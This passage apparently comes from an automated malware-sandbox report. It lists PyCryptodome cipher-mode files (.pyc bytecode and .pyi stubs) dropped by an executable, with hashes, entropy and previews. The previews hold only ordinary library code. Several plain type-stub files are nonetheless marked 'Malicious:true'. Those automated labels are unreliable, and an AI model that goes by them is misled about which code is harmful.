                                                                                                                                            Preview:...........e.a.............................d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...e.d.d.d.................Z...G.d...d.e...............Z.d...Z.d.S.).z".Counter with CBC-MAC (CCM) mode....CcmMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_writeable_buffer)...strxor)...long_to_bytes)...BLAKE2s)...get_random_bytesc.....................$.....t...........d.d.|...............S.).N..Enum..)...type)...enumss.... .oC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Cryptodome\Cipher\_mode_ccm.py..enumr....3...s..............E.."..".."...............)...NOT_STARTED..PROCESSING_AUTH_DATA..PROCESSING_PLAINTEXTc.....................p.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.S.).r....a....Counter with CBC-MAC (CCM)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provide

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_ccm.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1647
                                                                                                                                            Entropy (8bit):4.397477650476907
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7CnbKT3fAbSUA9UUOHMnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cuuvUXUO8vesLeJLn8nlEF49
                                                                                                                                            MD5:91133F991531450E28EE3F680FBF6F20
                                                                                                                                            SHA1:BB3761FBD4A0F912A77258D73B30D7E43403130E
                                                                                                                                            SHA-256:5F0058DE990A9668E5B0CE2273E74E0D5BFDF79F5E6745DC9B8FAEB39822A9AD
                                                                                                                                            SHA-512:F5FAF2155B4D172D3DDAF556DF2EF28E5CE93CE81F471AED1D7215C658EF03C9DAB71FA3BDABD3133951A1A64EA628587F8390D330280518B2CA60F0E6451D74
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, overload, Dict, Tuple, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CcmMode']....class CcmMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. msg_len: int,.. assoc_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> CcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str:

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_cfb.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10944
                                                                                                                                            Entropy (8bit):5.294742956505828
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:yw3jDCxEZ8orrU4B/NU4DfZZkZZZZqjbPpw:LrZ8oXTBFTDnjtw
                                                                                                                                            MD5:857F80FF46670CBEC96E079A54F0FE94
                                                                                                                                            SHA1:AD125DA210657A85A179AFD14C9A69207645E829
                                                                                                                                            SHA-256:4312845E4F3CAB6ED9BEB0626C02D2E268A6B9930BAA9707B70478303463074E
                                                                                                                                            SHA-512:566565043C2084695EFA50457831209A12F711F8AE4D1DA0D655259926037B46AC378DDB6C8F6B61FA4DB55258BC03EB1D2EF7DD0BCB17358BF51610CB9D918E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.+.............................d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z..Counter Feedback (CFB) mode....CfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Cryptodome.Cipher._raw_cfba .... int CFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. size_t segment_len, /* In bytes */. void **pResult);. int CFB_encrypt(void *cfbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CFB_decry

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_cfb.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):757
                                                                                                                                            Entropy (8bit):4.692214100146291
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1k1Jal9lvIY3FDDHo2YRyU1AOlsQRZFq6R5pFq6jI33ynFq6R5xnFq6jIF:1REPZjT3lGNAYsEHnRNne3yFnR3Fne3l
                                                                                                                                            MD5:C277ABB0D41936FA2B2C6C5A7555C9B2
                                                                                                                                            SHA1:87B8E4314BBB63E156CB1E2DB3BBE318B7B13803
                                                                                                                                            SHA-256:15EE428028300FCB807AF557DB278F229C260EC98E8AE1971661B436CFE5C2A9
                                                                                                                                            SHA-512:1D2BF9AE0D89776EE0D2622A520C6FA0590C5B900419502F55679AEEEF2D53DF468894DB87867AD9596E79D6E4CB04D3CCCA3F31B25D62CEB4222B92DBC544F1
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CfbMode']......class CfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer,.. segment_size: int) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_ctr.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15615
                                                                                                                                            Entropy (8bit):5.333812078327485
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:/HtGDPkH7KxiM16TsyUiFfU4PkdU4fYrLEj4SkIkjaXfAhS1LbM:fwb0SDb2fTPkdTfYrLPSkI+aX31M
                                                                                                                                            MD5:876FF17F002101A50E59F5BFE592E57C
                                                                                                                                            SHA1:E01BFD3A213AC1D884AAABDF9DC6775FA8D85417
                                                                                                                                            SHA-256:C1FE74230101906AD6A24E01913E2706FF325A7BFBD6D333505983672FF509E3
                                                                                                                                            SHA-512:7F5048A69F0DA1E45D1696F7D42549EB7B9296EA13F9A3CC869B9A37B5B9C0296B21D65C6B2861F138680821452718D47A07A962A914D1020278EB0D2F10475F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eu?.............................d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z..Counter (CTR) mode....CtrMode.....N)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytes)..._copy_bytes..is_native_int)...long_to_bytesz.Cryptodome.Cipher._raw_ctra..... int CTR_start_operation(void *cipher,. uint8_t initialCounterBlock[],. size_t initialCounterBlock_len,. size_t prefix_len,. unsigned counter_len,. unsigned littleEndian,. void **pResult);. int CTR_encrypt(void

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_ctr.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):831
                                                                                                                                            Entropy (8bit):4.595725224881154
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REPZjT3Q6fUAY4AVjjnRNne3yFnR3Fne38:YVLcZVjTvesLeM
                                                                                                                                            MD5:22DC24EE5319AB0ACF3D1AEFEE2854C5
                                                                                                                                            SHA1:91E1F26CE9FDA76A71AC3D761AAD3DFA1BA64996
                                                                                                                                            SHA-256:AB8697E3CDA28729D9CB6A6545EA1E3FCDC184C9E07BFB70D9FAEE38F27012EF
                                                                                                                                            SHA-512:3E4DAC2C8C87A11C783DAAC9F678B2A50220857636BDB7A9B1D23DF9F8421A9DC8BF63CF6FB6BD1EB4561615E712F19EC932180D0BC398F7AB7F2E5CD62BD32F
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CtrMode']....class CtrMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. block_cipher: SmartPointer,.. initial_counter_block: Buffer,.. prefix_len: int,.. counter_len: int,.. little_endian: bool) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_eax.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16164
                                                                                                                                            Entropy (8bit):5.348455166474443
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:AwX+X6qFM4jDTFVyfTHMR/A7Ip47ai99kGzecWRK:AjX6vwloIJu7amHzeRK
                                                                                                                                            MD5:C8748305FF48DA4075654AF9FBEF4075
                                                                                                                                            SHA1:86FF755CBF54FE7C7C2B398D11A99B0940F06E20
                                                                                                                                            SHA-256:117A3D461E180020A3D4BCE5C7250E5C0B9A24B31F5000C9806167FB989AC41F
                                                                                                                                            SHA-512:D0018394341BFB633B6C9D7AB151DD987E01F33BBEEC3CA2B4AAC247DB5BD4609D9F05BB0571CE4F061DE230EE31C632959512078D58A1EB9F1794263F5F0A45
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e-:.............................d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.d...Z.d.S.).z..EAX mode....EaxMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_buffer)...strxor)...long_to_bytes..bytes_to_long)...CMAC..BLAKE2s)...get_random_bytesc.....................V.....e.Z.d.Z.d.Z.d...Z.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.S.).r....a....*EAX* mode... This is an Authenticated Encryption with Associated Data. (`AEAD`_) mode. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed,. and it will still be subject to authentication... The decryption step tells the receiver if the message comes. from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message -. including the header - has been modified or corrupted.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_eax.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1590
                                                                                                                                            Entropy (8bit):4.436811038410909
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7C/DsT3VEA9UbnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:c+AGXrvesLeJLn8nlEF49
                                                                                                                                            MD5:B414CB43B46387AD1B1B2AD15F66314E
                                                                                                                                            SHA1:DE8BFF4EE379D1F4A7DF3EC4051A3CB1D3DCB09E
                                                                                                                                            SHA-256:C5246506D2FF0E2B13BAE3A5D47467C47994932C24499FEFCF32126C39BF9611
                                                                                                                                            SHA-512:0788A2CF03A23CD2788A592E5C201F2632CABEF44B9094158A7B5A02B0AB97202C05562FD78F585554E7A4FEA2C862B885F3E5074792080285787F112CCB5F22
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Any, Union, Tuple, Dict, overload, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['EaxMode']....class EaxMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> EaxMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> No

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_ecb.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8206
                                                                                                                                            Entropy (8bit):5.266936476305002
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JQRS6kvViAtXEshfxCx7l7amadVgrPqBP6sQLR7DHdMwqc5p3hxhS6ZJi3Xq:Jdipsh279aGv9XhfJg6
                                                                                                                                            MD5:C29D092D39A83A2C5E9A689B351E9C26
                                                                                                                                            SHA1:06A6A83038B3A9893B436E5D97B3C0B1F37A37AA
                                                                                                                                            SHA-256:DBF80AF47BA92D1C3942F842F711F967B5A33AF45FDE3BB1C9B667B11634C01C
                                                                                                                                            SHA-512:DB98E6B3E1D406077217F10EDBD20CF92C49242987A027108A4822A44D220641E63A63FBF7D38C1D6DB1A6CDB9A43893A426708B713D37270164293042D2D5E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e]!........................r.....d.Z.d.g.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z".Electronic Code Book (ECB) mode....EcbMode.....)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_bufferz.Cryptodome.Cipher._raw_ecbak.... int ECB_start_operation(void *cipher,. void **pResult);. int ECB_encrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_decrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_stop_operation(void *state);. c.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_ecb.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):615
                                                                                                                                            Entropy (8bit):4.8565980350251685
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1k1Jal9lvIY3FDlD1AZlUFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REPZjT3PJAbCnRNne3yFnR3Fne38
                                                                                                                                            MD5:125B8830D549BBC165F15871922DE5E5
                                                                                                                                            SHA1:183D164CB3135E0DD3A27F91D20EB39DD01B2B64
                                                                                                                                            SHA-256:8A8A5ED79EFAFC9CB7A3AD95BAE1ABCAA4E447776760778E91FDD6E510714352
                                                                                                                                            SHA-512:F7B871B62D73B4AE40E3FD6FD65C8078F10464D9976E9760CC7B34541A1DFF43548DA0B31B47BA5A55C50033B0D5DE6D3549C594E2792D036907949CA6DF0C5B
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = [ 'EcbMode' ]....class EcbMode(object):.. def __init__(self, block_cipher: SmartPointer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_gcm.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24807
                                                                                                                                            Entropy (8bit):5.415128285248984
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:2SaWw4SgqFGRVwkJRkPM4SjL8Tn4klTfZkgMybU7BS7ocYyb67meJh9:2Ow4SgqMOU9L+9OgMybUE7x/Kz
                                                                                                                                            MD5:9C7BC3803B4675635C2B798CEDFD8B1E
                                                                                                                                            SHA1:C4151FA068D91BA136834EA74FCAECF00408D39D
                                                                                                                                            SHA-256:E202E22A6F4B506CFA7746DC997203816FEB9199837EEFAC1189CD756A25C50C
                                                                                                                                            SHA-512:88A3A3BB9446599627806E4D7D6B22B4D493C8993DD45DBF3850E0C2080ABE6603D034D6F22CB5B91575B3670642ABF6E7D4D225EBE3C97342762DAF00CA8F33
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.U........................,.....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d...Z.d...Z...e...............Z.d...Z...e...............Z...G.d...d.e...............Z d...Z!..e!d.d.................Z"..G.d...d.e...............Z#d...Z$d.S.).z..Galois/Counter Mode (GCM)....GcmMode.....)...unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)...BLAKE2s)...get_random_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_featuresa`.... int ghash_%imp%(uint8_t y_out[16],. const uint8_t block_data[],. size_t len,. const uint8_t y_in[16],. const void *exp_key);. int ghash_expand_%imp%(const uint8_t h[16],. void **ghash_tables);. int ghash_destroy_%imp%(void *ghash_tables);.c..........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_gcm.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1586
                                                                                                                                            Entropy (8bit):4.431900531457141
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7ClDOT3zRA9UCLnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cSuVXQvesLeJLn8nlEF49
                                                                                                                                            MD5:7D3D576FC1628D95451DC9436EC64091
                                                                                                                                            SHA1:742B2C357FF613BC5D5285211D3D52AA4BD6F445
                                                                                                                                            SHA-256:49B6A847D2C71DA556387D1987946EDD0C259CCF3952C63C9D1061CB4EB731FE
                                                                                                                                            SHA-512:8781937E2570F5FE246F0349A41CC3406E40156F9FDEC08701983DB091DA06637B6CD428D109A57F40B61F3D72DA825F69ABA1BC0F1DFA3D9660A21E88DFFA74
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Tuple, Dict, overload, Optional....__all__ = ['GcmMode']....Buffer = Union[bytes, bytearray, memoryview]....class GcmMode(object):.. block_size: int.. nonce: Buffer.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> GcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None:

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_ocb.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):21493
                                                                                                                                            Entropy (8bit):5.34105960437538
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:JCqHG+qi2jGRJF44h3R422oD9eWWEne47l8vadgETqZr0Tx19j57:JCsG+qJujhBYZQqa9qhmD9j57
                                                                                                                                            MD5:4490D4E12D59A2C6B4E1B9B7297785FF
                                                                                                                                            SHA1:F40E84B92F52F2D9A3FE5A4056C90858425A68F5
                                                                                                                                            SHA-256:6E015F79A31EC051AA54C2C5DADDD696E058A6E59804DB6B3831F5B2E293C49B
                                                                                                                                            SHA-512:F72DB4940DF0933AC95588EDF4E028A41D19647E0C343C9FE0BCD04CB3495F3B61D82D7550CC2784B6076A67B843FB73435FA32E164352D37085F0BD8E172BEB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.P..............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).ap....Offset Codebook (OCB) mode...OCB is Authenticated Encryption with Associated Data (AEAD) cipher mode.designed by Prof. Phillip Rogaway and specified in `RFC7253`_...The algorithm provides both authenticity and privacy, it is very efficient,.it uses only one key and it can be used in online mode (so that encryption.or decryption can start before the end of the message is available)...This module implements the third and last variant of OCB (OCB3) and it only.works in combination with a 128-bit block symmetric cipher, like AES...OCB is patented in US but `free licenses`_ exist for software implementations.meant for non-military purposes...Example:. >>> from Cryptodome.Cipher import AES. >>> from Cryptodome.Random import get_random_bytes

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_ocb.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1267
                                                                                                                                            Entropy (8bit):4.510576229003074
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7CRDQlT30xA949nRNne3yFnR3Fne3UPtWYn90E+5Q:ccQlARNvesLeJYnaEv
                                                                                                                                            MD5:76916331AA1417BD4EADDD10948D8D26
                                                                                                                                            SHA1:1223CEC2D805BE11A585A842EDA6B0214F1AB3E3
                                                                                                                                            SHA-256:E0C136E3762DD93C24793DAF989D94061AF30A300D7308BC8AD2EF69E73A92E5
                                                                                                                                            SHA-512:BABD83C1F0D4399B0B2FB099B8303303694763104B75C56C64CAD8C0A722B7F3FEE5FA0EA11026857E5822853D73905B45AA83EF4DAC23D8DD56A6EF41C73621
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Any, Optional, Tuple, Dict, overload....Buffer = Union[bytes, bytearray, memoryview]....class OcbMode(object):.. block_size: int.. nonce: Buffer.... def __init__(self,.. factory: ModuleType,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> OcbMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None:

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_ofb.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10331
                                                                                                                                            Entropy (8bit):5.2681367362904385
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:loy5NPuxI4HU4JWVU4w8GZZkZZZZAjm7TbAAAFJ:N34HTJWVTwTja2
                                                                                                                                            MD5:DE923D284AF36F334D73536CDF0EB983
                                                                                                                                            SHA1:F8572DD1885D96255656E437022827EB0F31F265
                                                                                                                                            SHA-256:629730B1A7E4836CD0151623D107653FA403214A563F144836B5103FF9C9B4A6
                                                                                                                                            SHA-512:EC4B16E97D490DEF18567EA7549A7AE706A2058A2DB264AEA17F8F4BD29EC0C8E417BB1BC008FCAE028EAD8753F7C3DBBBE61F084271B4EE8164BBEFF2C80B55
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.).............................d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z..Output Feedback (CFB) mode....OfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Cryptodome.Cipher._raw_ofba..... int OFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int OFB_encrypt(void *ofbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int OFB_decrypt(void *ofbState,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Cipher\_mode_ofb.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):720
                                                                                                                                            Entropy (8bit):4.737448172448685
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1k1Jal9lvIY3FDXHo2JRyU1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REPZjT3pHo2NAY4nRNne3yFnR3Fne38
                                                                                                                                            MD5:8E7443C03B74A4BB74BBBCF7A93282A7
                                                                                                                                            SHA1:7A9C908B9D698278E5561A45A024C8DDF53CF304
                                                                                                                                            SHA-256:D1B1A685ABE48604348DA3AE3C54BAF54ED0BD5CC9F0CB93867A82F8877F9ECF
                                                                                                                                            SHA-512:F9580522EE9EE5F223E8D43F8E61D5CE054D9E1B4F361AD2B6C9DE9CAFCF95BECF8DF21D0B5CDECF59CEA2808F01D0952CD34A4F54B354F506CCA6D971E1F6C5
                                                                                                                                            Malicious:true
